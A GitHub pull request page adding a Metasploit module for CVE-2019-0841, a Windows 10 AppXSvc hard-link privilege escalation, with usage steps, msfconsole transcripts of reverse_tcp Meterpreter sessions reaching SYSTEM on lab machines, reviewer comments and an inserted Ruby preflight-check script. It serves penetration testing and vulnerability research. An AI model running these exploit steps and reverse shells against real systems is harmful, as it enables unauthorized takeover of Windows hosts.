Add module for CVE-2019-0841 #12070

Merged
merged 14 commits into from Jul 15, 2019

Conversation

space-r7 (Contributor) commented Jul 8, 2019

This adds a module that exploits a privilege escalation vulnerability in Windows 10 builds prior to 17763.

Hard link and DiagHub code written by James Forshaw.

Resolves #11707

Verification

  • Start msfconsole
  • Get a low-privileged session
  • Do: use exploit/windows/local/appxsvc_hard_link_privesc
  • Do: set SESSION <session>
  • Do: set PAYLOAD <payload>
  • Do: set LHOST <ip>
  • Do: run
  • You should get a shell running as SYSTEM

Scenarios

  msf5 > use multi/handler
  msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
  payload => windows/x64/meterpreter/reverse_tcp
  msf5 exploit(multi/handler) > set lhost 192.168.37.1
  lhost => 192.168.37.1
  msf5 exploit(multi/handler) > run

  [*] Started reverse TCP handler on 192.168.37.1:4444
  [*] Sending stage (206403 bytes) to 192.168.37.135
  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.135:49985) at 2019-07-08 12:01:09 -0500

  meterpreter > getuid
  Server username: DESKTOP-L5FDSM7\Shelby Pace
  meterpreter > background
  [*] Backgrounding session 1...
  msf5 exploit(multi/handler) > use exploit/windows/local/appxsvc_hard_link_privesc
  msf5 exploit(windows/local/appxsvc_hard_link_privesc) > set session 1
  session => 1
  msf5 exploit(windows/local/appxsvc_hard_link_privesc) > set payload windows/x64/meterpreter/reverse_tcp
  payload => windows/x64/meterpreter/reverse_tcp
  msf5 exploit(windows/local/appxsvc_hard_link_privesc) > set lhost 192.168.37.1
  lhost => 192.168.37.1
  msf5 exploit(windows/local/appxsvc_hard_link_privesc) > run

  [!] SESSION may not be compatible with this module.
  [*] Started reverse TCP handler on 192.168.37.1:4444
  [+] Successfully created hard link
  [*] Attempting to launch Microsoft Edge minimized.
  [*] Writing the payload to disk
  [*] Sending stage (206403 bytes) to 192.168.37.135
  [*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.135:49986) at 2019-07-08 12:02:02 -0500

  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM
  meterpreter > sysinfo
  Computer        : DESKTOP-L5FDSM7
  OS              : Windows 10 (Build 16299).
  Architecture    : x64
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x64/windows
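
The two pre-flight checks a tester wants before running the module as described above are whether the session's reported build falls in the range this PR names (Windows 10 builds prior to 17763) and whether the payload architecture matches the session architecture, as done in the transcripts (an x86 session with windows/meterpreter/reverse_tcp, an x64 session with windows/x64/meterpreter/reverse_tcp). The Ruby script below is an added example, not code from this pull request or from the Metasploit module: it parses the `sysinfo` and `sessions` strings shown on this page and applies both checks. The function names, the session-type-to-payload mapping, and the use of 17763 as the cut-off (taken from the PR text, not from the module's own check) are this example's assumptions.

```ruby
# Added example (not the module's code): pre-flight checks for a local
# privilege-escalation module, driven by the strings Meterpreter prints.

# Build range stated in the pull request: Windows 10 builds prior to 17763.
# Assumption taken from the PR text, not from the module's check().
FIXED_BUILD = 17763

# Parse the "OS" field of `sysinfo`, e.g. "Windows 10 (Build 16299)."
# Returns the build number as an Integer, or nil when the string is not a
# Windows 10 string carrying a build number.
def parse_win10_build(os_string)
  m = os_string.match(/\AWindows 10 \(Build (\d+)\)/)
  m && m[1].to_i
end

# True when the reported build is below the cut-off this PR describes.
def vulnerable_build?(os_string)
  build = parse_win10_build(os_string)
  !build.nil? && build < FIXED_BUILD
end

# Map a session "Type" (as shown by the `sessions` command) to the payload
# used with it in the transcripts above. Hypothetical mapping for this example.
PAYLOAD_FOR_SESSION = {
  'meterpreter x86/windows' => 'windows/meterpreter/reverse_tcp',
  'meterpreter x64/windows' => 'windows/x64/meterpreter/reverse_tcp',
}.freeze

def payload_for(session_type)
  PAYLOAD_FOR_SESSION.fetch(session_type) do
    raise ArgumentError, "no payload mapping for session type #{session_type.inspect}"
  end
end

# Parse a `sysinfo` block ("Field : value" lines) into a Hash keyed by field.
def parse_sysinfo(text)
  text.each_line.with_object({}) do |line, h|
    key, value = line.split(':', 2)
    next if value.nil?
    h[key.strip] = value.strip
  end
end

# Run both checks for one session and return the findings as a Hash.
def preflight(sysinfo_text, session_type)
  info = parse_sysinfo(sysinfo_text)
  os = info['OS'].to_s
  {
    build: parse_win10_build(os),
    vulnerable: vulnerable_build?(os),
    payload: payload_for(session_type),
    # the session type string carries "x86" or "x64"; it must agree with sysinfo
    arch_matches: info['Architecture'] == session_type[/x(86|64)/],
  }
end

# Constructed sample input, copied from the x64 transcript above.
SAMPLE_SYSINFO_X64 = <<~INFO
  Computer        : DESKTOP-L5FDSM7
  OS              : Windows 10 (Build 16299).
  Architecture    : x64
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x64/windows
INFO

if $PROGRAM_NAME == __FILE__
  p preflight(SAMPLE_SYSINFO_X64, 'meterpreter x64/windows')
end
```

The build regex deliberately matches only "Windows 10 (Build N)" strings, so a server or unexpected OS string yields nil rather than a false positive; `payload_for` raises on a session type outside the two seen on this page instead of guessing.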
space-r7 added 8 commits Jun 6, 2019
jrobles-r7 (Contributor) commented Jul 9, 2019

I've seen other modules with the source code in its own directory such as external/source/exploits/<CVE#>, but I don't see that mentioned in the Wiki as a standard so maybe that's a non-issue.

space-r7 (Contributor, Author) commented Jul 9, 2019

> I've seen other modules with the source code in its own directory such as external/source/exploits/<CVE#>, but I don't see that mentioned in the Wiki as a standard so maybe that's a non-issue.

I'll go ahead and move them. Thanks!

space-r7 added 2 commits Jul 9, 2019
space-r7 and others added 3 commits Jul 9, 2019
Co-Authored-By: @shellfail <jrobles@rapid7.com>
jrobles-r7 (Contributor) commented Jul 9, 2019

#write_to_disk and #load_dll_with_diaghub share a lot of code.
Maybe create a generic #upload_file(file_name) and set f_name and exe_name in #exploit (combine the if/elsif from #write_to_disk and #load_dll_with_diaghub)

wchen-r7 (Contributor) commented Jul 11, 2019

Nicely done amigo!

space-r7 (Contributor, Author) commented Jul 11, 2019

> Nicely done amigo!

Thank you!

ccondon-r7 (Contributor) commented Jul 14, 2019

Love the teamwork :) Thanks for being awesome, all.

jrobles-r7 self-assigned this Jul 15, 2019
jrobles-r7 (Contributor) commented Jul 15, 2019

msf5 exploit(windows/local/appxsvc_hard_link_privesc) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                 Connection
  --  ----  ----                     -----------                                 ----------
  2         meterpreter x86/windows  DESKTOP-T6J3V2L\testuser @ DESKTOP-T6J3V2L  172.22.222.136:4444 -> 172.22.222.130:49860 (172.22.222.130)
  4         meterpreter x64/windows  DESKTOP-U2KHUKO\testuser @ DESKTOP-U2KHUKO  172.22.222.136:4444 -> 172.22.222.135:50076 (172.22.222.135)

msf5 exploit(windows/local/appxsvc_hard_link_privesc) > set session 2
session => 2
msf5 exploit(windows/local/appxsvc_hard_link_privesc) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/appxsvc_hard_link_privesc) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.22.222.136:4444 
[+] Successfully created hard link
[*] Attempting to launch Microsoft Edge minimized.
[*] Writing the payload to disk
[*] Sending stage (179779 bytes) to 172.22.222.130
[*] Meterpreter session 8 opened (172.22.222.136:4444 -> 172.22.222.130:50144) at 2019-07-15 09:15:56 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-T6J3V2L
OS              : Windows 10 (Build 15063).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > background
[*] Backgrounding session 8...
msf5 exploit(windows/local/appxsvc_hard_link_privesc) > set session 4
session => 4
msf5 exploit(windows/local/appxsvc_hard_link_privesc) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/appxsvc_hard_link_privesc) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.22.222.136:4444 
[+] Successfully created hard link
[*] Attempting to launch Microsoft Edge minimized.
[*] Writing the payload to disk
[*] Sending stage (206403 bytes) to 172.22.222.135
[*] Meterpreter session 9 opened (172.22.222.136:4444 -> 172.22.222.135:50097) at 2019-07-15 09:16:17 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-U2KHUKO
OS              : Windows 10 (Build 15063).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >
jrobles-r7 merged commit 70d67f1 into rapid7:master Jul 15, 2019
3 checks passed:
  Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
  Metasploit Automation - Test Execution: Successfully completed all tests.
  continuous-integration/travis-ci/pr: The Travis CI build passed
jrobles-r7 added a commit that referenced this pull request Jul 15, 2019
msjenkins-r7 added a commit that referenced this pull request Jul 15, 2019
jrobles-r7 (Contributor) commented Jul 15, 2019

Release Notes

A module that targets CVE-2019-0841 is now available. It exploits AppXSvc's improper handling of hard links to gain full privileges over a SYSTEM-owned file.

space-r7 deleted the space-r7:appxsvr_windows_lpe branch Jul 15, 2019
tdoan-r7 added the rn-modules label Jul 24, 2019